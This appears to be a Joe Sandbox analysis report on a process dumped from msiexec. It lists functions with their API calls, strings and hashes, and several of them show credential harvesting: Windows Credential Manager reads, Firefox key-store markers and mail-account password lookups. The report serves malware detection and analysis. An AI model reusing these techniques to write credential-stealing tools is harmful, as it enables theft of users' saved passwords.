                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Temp$ClipboardDirectoryErrorFileLastNameOpenPathWindows
                                                              • String ID: pwg
                                                              • API String ID: 1189762176-867261680
                                                              • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                              • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                              • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                              • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                              Function 004073EF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbscat$memsetsprintf
                                                              • String ID: %2.2X
                                                              • API String ID: 125969286-791839006
                                                              • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                              • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                              • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                              • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                              Function 00444196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                              • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                              • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                              • CloseHandle.KERNEL32(?), ref: 00444206
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: File$??2@??3@$ByteCharCloseHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                              • String ID: ACD
                                                              • API String ID: 82305771-620537770
                                                              • Opcode ID: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                              • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                              • Opcode Fuzzy Hash: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                              • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                              Function 004091C1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 004091EC
                                                              • sprintf.MSVCRT ref: 00409201
                                                                • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                              • SetWindowTextA.USER32(?,?), ref: 00409228
                                                              • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                              • String ID: caption$dialog_%d
                                                              • API String ID: 2923679083-4161923789
                                                              • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                              • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                              • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                              • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                              Function 00426918 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E
                                                              Strings
                                                              • abort due to ROLLBACK, xrefs: 00428781
                                                              • no such savepoint: %s, xrefs: 00426A02
                                                              • unknown error, xrefs: 004277B2
                                                              • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                              • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                              • API String ID: 3510742995-3035234601
                                                              • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                              • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                                                              • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                              • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                                                              Function 0042B927 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                              • API String ID: 2221118986-3608744896
                                                              • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                              • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                                                              • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                              • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                                                              Function 004429A4 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 259COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memcpy.MSVCRT(00000058,00451D20,00000030,?,00000143,00000000,004067AF,?), ref: 00442A5E
                                                                • Part of subcall function 0044257F: memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcmpmemcpy
                                                              • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                              • API String ID: 1784268899-4153596280
                                                              • Opcode ID: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                              • Instruction ID: 8c81c6e629260c6e32056db5335e0b2518b1498a844935eff1e92b421965135b
                                                              • Opcode Fuzzy Hash: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                              • Instruction Fuzzy Hash: 8391F3B1A007009FE730EF25C981B5FBBE4AB44304F50492FF4569B392D7B9E9458B99
                                                              Function 004101AF Relevance: 9.1, APIs: 6, Instructions: 143COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                              • memset.MSVCRT ref: 00410246
                                                              • memset.MSVCRT ref: 00410258
                                                                • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                              • memset.MSVCRT ref: 0041033F
                                                              • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                              • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                              • String ID:
                                                              • API String ID: 3974772901-0
                                                              • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                              • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                              • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                              • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                              Function 00444059 Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • wcslen.MSVCRT ref: 0044406C
                                                              • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                              • strlen.MSVCRT ref: 004440D1
                                                                • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                              • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                              • String ID:
                                                              • API String ID: 577244452-0
                                                              • Opcode ID: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                              • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                              • Opcode Fuzzy Hash: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                              • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                              Function 00404487 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                              • _strcmpi.MSVCRT ref: 00404518
                                                              • _strcmpi.MSVCRT ref: 00404536
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _strcmpi$memcpystrlen
                                                              • String ID: imap$pop3$smtp
                                                              • API String ID: 2025310588-821077329
                                                              • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                              • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                              • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                              • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                              Function 0040C00D Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040C02D
                                                                • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                              • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                              • API String ID: 2726666094-3614832568
                                                              • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                              • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                              • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                              • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                              Function 00403A61 Relevance: 9.1, APIs: 6, Instructions: 57filestringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00403A88
                                                              • memset.MSVCRT ref: 00403AA1
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,?,?,?), ref: 00403AB8
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                                              • strlen.MSVCRT ref: 00403AE9
                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                              • String ID:
                                                              • API String ID: 1786725549-0
                                                              • Opcode ID: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                              • Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
                                                              • Opcode Fuzzy Hash: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                              • Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
                                                              Function 0040613B Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                              • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                              • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                              • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcmp$memcpy
                                                              • String ID: global-salt$password-check
                                                              • API String ID: 231171946-3927197501
                                                              • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                              • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                              • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                              • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                              Function 00443473 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                              • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                              • Opcode Fuzzy Hash: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                              • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                              Function 00401694 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetClientRect.USER32(?,?), ref: 004016A3
                                                              • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                              • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                              • BeginPaint.USER32(?,?), ref: 004016D7
                                                              • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                              • EndPaint.USER32(?,?), ref: 004016F3
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                              • String ID:
                                                              • API String ID: 19018683-0
                                                              • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                              • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                              • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                              • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                              Function 004063B2 Relevance: 8.9, APIs: 7, Instructions: 157COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040644F
                                                              • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                              • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                              • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                              • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                              • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                              • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID:
                                                              • API String ID: 438689982-0
                                                              • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                              • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                              • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                              • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                              Function 0044493E Relevance: 8.9, APIs: 7, Instructions: 147stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0044495F
                                                              • memset.MSVCRT ref: 00444978
                                                              • memset.MSVCRT ref: 0044498C
                                                                • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                              • strlen.MSVCRT ref: 004449A8
                                                              • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449CD
                                                              • memcpy.MSVCRT(?,?,00000008,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449E3
                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                              • memcpy.MSVCRT(?,?,00000008,?,?,?,?,00000008,?,00000000,00000000), ref: 00444A23
                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset$strlen
                                                              • String ID:
                                                              • API String ID: 2142929671-0
                                                              • Opcode ID: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                                              • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                                                              • Opcode Fuzzy Hash: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                                              • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                                                              Function 0040F6E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
